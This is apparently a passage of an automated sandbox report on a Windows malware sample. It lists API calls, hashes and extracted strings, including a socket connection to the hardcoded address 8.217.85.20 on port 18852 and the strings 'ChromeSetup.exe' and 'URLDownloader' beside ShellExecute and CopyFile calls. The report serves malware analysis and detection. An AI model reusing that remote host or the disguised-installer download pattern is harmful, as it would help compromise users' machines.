                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 10016C06
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10016C15
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 10016C1E
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 10016C2B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                                  • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008E670E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction ID: 4f89cdc36d4eb4707b36a4d6fc179db05d0913e758f4f6e1447a6033a2288b05
                                                                                                  • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction Fuzzy Hash: 88A17EB1E00669CBEB19CF55C8C1BA9BBB1FB59364F19C22AE415E7250E334D960CF90
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10016737
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction ID: 772fdfb54747e28d4c8254296b593cf3c963f9d1e760632a41fcaf1a051b6687
                                                                                                  • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                  • Instruction Fuzzy Hash: ABA128B1A10669CBEB15CF54CCC1BA9BBF4FB48364F19C62AE415AB290D374D984CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                  • Instruction ID: 74a84e5746233f73a5d1a6a2f87331474e54b7ce7239d5b21f2ea63068075f21
                                                                                                  • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                  • Instruction Fuzzy Hash: 7C317C76A0834A8FC710DF18C480A2AB7E4FF89328F190A6EE895D7312D370F9558F91
                                                                                                  APIs
                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                                  • getaddrinfo.WS2_32(8.217.85.20,18852,?,00000000), ref: 100154FA
                                                                                                  • WSACleanup.WS2_32 ref: 10015509
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                                  • socket.WS2_32(?,?,?), ref: 10015552
                                                                                                  • WSACleanup.WS2_32 ref: 10015566
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                  • String ID: 18852$8.217.85.20
                                                                                                  • API String ID: 2357443324-3503856973
                                                                                                  • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                                  • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 008D1659
                                                                                                    • Part of subcall function 008D1407: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 008D1462
                                                                                                    • Part of subcall function 008D1407: CoTaskMemFree.COMBASE(00000000), ref: 008D14B5
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 008D176F
                                                                                                  • RegisterClassW.USER32(?), ref: 008D17CE
                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 008D17D6
                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 008D17E9
                                                                                                  • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 008D1835
                                                                                                  • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?), ref: 008D1844
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008D186B
                                                                                                  • TranslateMessage.USER32(?), ref: 008D1879
                                                                                                  • DispatchMessageW.USER32(?), ref: 008D1883
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$CreateMetricsSystemWindow$ClassDispatchFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslate
                                                                                                  • String ID: ChromeSetup.exe$URLDownloader
                                                                                                  • API String ID: 3953380684-4101260699
                                                                                                  • Opcode ID: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                  • Instruction ID: e2a26e6c0056cbdf55e8e83543229713c6f2a0d485e09365b971e6d2728ef5c9
                                                                                                  • Opcode Fuzzy Hash: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                  • Instruction Fuzzy Hash: D671F9B1D00258AFEB14DFA8CC45BDDBBB4FB48700F10826AE609E7280E7749A45CF51
                                                                                                  APIs
                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 008E548A
                                                                                                  • getaddrinfo.WS2_32(1001C0E0,100185B0,?,00000000), ref: 008E54D1
                                                                                                  • WSACleanup.WS2_32 ref: 008E54E0
                                                                                                  • socket.WS2_32(?,?,?), ref: 008E5529
                                                                                                  • WSACleanup.WS2_32 ref: 008E553D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560534018-0
                                                                                                  • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction ID: 98c35626c7c20e31f4b5eb43d37a6c9f45a626a155e8b828348e9a6afdb72c70
                                                                                                  • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                  • Instruction Fuzzy Hash: E86117B1904629EFE704CFA8CD88FAD77B5FB09309F108618E519A72A0D734DA40CF65
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,10001A66,00000000,00000000,28DFAA23,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016F29
                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016F65
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,?,00000000,00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FA4
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 10016FAF
                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FC0
                                                                                                  • _com_issue_error.COMSUPP ref: 10016FD8
                                                                                                  • _com_issue_error.COMSUPP ref: 10016FE2
                                                                                                  • GetLastError.KERNEL32(80070057,28DFAA23,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016FE7
                                                                                                  • _com_issue_error.COMSUPP ref: 10016FFA
                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017008
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017010
                                                                                                  • _com_issue_error.COMSUPP ref: 10017023
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWidefree$AllocStringmalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2710271231-0
                                                                                                  • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction ID: 6285890bd5176054e2d15964e4e0697efcddc290ec620ce681aa416c4b1e3c3a
                                                                                                  • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction Fuzzy Hash: EA41C3B5A00219ABD700CFA8DC45B9EBBE9FB4C650F114229F509EB281D735E981CBA0
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,008D1A3B,008D1A3D,00000000,00000000,1001C040,?,?,?,008D1BBB,008D1A3B,00000000,?,008D1A3B,008D27A3), ref: 008E6F00
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,008D1A3B,?,00000000,00000000,?,008D1BBB,008D1A3B,00000000,?,008D1A3B), ref: 008E6F7B
                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 008E6F86
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FAF
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FB9
                                                                                                  • GetLastError.KERNEL32(80070057,1001C040,?,?,?,008D1BBB,008D1A3B,00000000,?,008D1A3B,008D27A3), ref: 008E6FBE
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FD1
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,008D1BBB,008D1A3B,00000000,?,008D1A3B,008D27A3), ref: 008E6FE7
                                                                                                  • _com_issue_error.COMSUPP ref: 008E6FFA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                  • String ID:
                                                                                                  • API String ID: 1353541977-0
                                                                                                  • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction ID: 39e2daa92579a9dc51cff7447b150ad1b1eea4b6c7f276c153012b0298162f43
                                                                                                  • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                  • Instruction Fuzzy Hash: 96412CB1A04255EBDB10DF6ADC45BAEBBA8FF59790F204229F505D7380EB34D910C7A1
                                                                                                  APIs
                                                                                                  • __RTC_Initialize.LIBCMT ref: 1001650A
                                                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 10016524
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 2442719207-0
                                                                                                  • Opcode ID: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                  • Instruction ID: a50b9bcbe80e21d08239303d3e1b85a5ff725acd6039f41ad542be21913079e7
                                                                                                  • Opcode Fuzzy Hash: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                  • Instruction Fuzzy Hash: A7419372E01629AFDB21CF94DD41B9E7AB9EB4C690F118129F8146F151C731DE818BE0
                                                                                                  APIs
                                                                                                  • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012187
                                                                                                  • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012194
                                                                                                  • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001219F
                                                                                                  • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 100121BB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1504536088-3916222277
                                                                                                  • Opcode ID: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                  • Instruction ID: a0487576b8a3c5ffe6c335ea50ad64326e07086e404223857e371bd2d0d575a7
                                                                                                  • Opcode Fuzzy Hash: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                  • Instruction Fuzzy Hash: 9C5161F5D00119EFDB04CFD4D8819EEBBB5EF48244F148459E901AB241EB34EBA4CBA5
                                                                                                  APIs
                                                                                                    • Part of subcall function 008D5487: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 008D54A8
                                                                                                    • Part of subcall function 008E5727: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008E575A
                                                                                                    • Part of subcall function 008E56D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008E56F5
                                                                                                  • _Smanip.LIBCPMTD ref: 008E5AE1
                                                                                                  • _Smanip.LIBCPMTD ref: 008E5B7B
                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 008E5CB8
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 008E5CD4
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008E5CE1
                                                                                                  • CopyFileA.KERNEL32(00000000,?,00000000), ref: 008E5D4A
                                                                                                  • ShellExecuteA.SHELL32(00000000,100185D4,?,00000000,00000000,00000001), ref: 008E5D70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyFolderHandleObjectPathSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 831046560-0
                                                                                                  • Opcode ID: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                                  • Instruction ID: d2a75ef10eadf8d31c25cbf06ee296667e39cb4e8b128bce72abc6f2f74631cd
                                                                                                  • Opcode Fuzzy Hash: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                                  • Instruction Fuzzy Hash: 27023670D083D8DEEB11DBA8C855BDDBFB1AF26304F0441D9D1486B282D7BA5B48CB62
                                                                                                  APIs
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CF2
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CFF
                                                                                                  • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011D0A
                                                                                                  • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10011D17
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 623893373-0
                                                                                                  • Opcode ID: 52e15d50399265125c64f399d886bb165b5bbf37f1e1fda9a42ed22037138c62
                                                                                                  • Instruction ID: a0288be0b98a9ca1868d6d550198ab6d9a445e2d27cbf722241acd90e910a963
                                                                                                  • Opcode Fuzzy Hash: 52e15d50399265125c64f399d886bb165b5bbf37f1e1fda9a42ed22037138c62
                                                                                                  • Instruction Fuzzy Hash: 23716AB5C1021DDFDB18DFE4D8959EEB7B1FF04250F104129E516AB291EB30AE85CBA1
                                                                                                  APIs
                                                                                                  • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 10011B98
                                                                                                  • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011BB8
                                                                                                  • _Min_value.LIBCPMTD ref: 10011BCF
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10011BE3
                                                                                                  • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011C0F
                                                                                                  • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 10011C4D
                                                                                                  • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 10011C9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                  • String ID:
                                                                                                  • API String ID: 1591557727-0
                                                                                                  • Opcode ID: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                                  • Instruction ID: e0e71f9b7f058a59da033de4bce7e27fb15f803cdd6c81aee40a3e1b4d5913a5
                                                                                                  • Opcode Fuzzy Hash: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                                  • Instruction Fuzzy Hash: CF51C775E00109EFDB48CF98C984AEEBBB5FF88344F108169E905AB354D730AE85DB90
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 3353612457-0
                                                                                                  • Opcode ID: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                                  • Instruction ID: 54edc5666c311e175fc24a18419b6af998dcce978129f85e44b2e6ec709a6a51
                                                                                                  • Opcode Fuzzy Hash: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                                  • Instruction Fuzzy Hash: E6216DB2D01669ABDB21CF55DD41E6E3AA9EB8CAD0F014129F8146F255C231DE819BE0
                                                                                                  APIs
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001200D
                                                                                                  • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001201E
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012029
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10012053
                                                                                                  • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10012083
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 4206206407-0
                                                                                                  • Opcode ID: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                                  • Instruction ID: ed5e708f9a507b4adfd911d3508ec20c212b5a391fedcf247e80062d61f76bb5
                                                                                                  • Opcode Fuzzy Hash: 9fc12d2fec2c330bd392a39c3e1c5fe0c8e6a097ec772b7a36a433fcf897c115
                                                                                                  • Instruction Fuzzy Hash: C531C5F9E00108BBDB04EFA4D89599D7BB6EF54244F008069F9069F242EB31EAD5CB95
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004EF7
                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 10004F34
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004F51
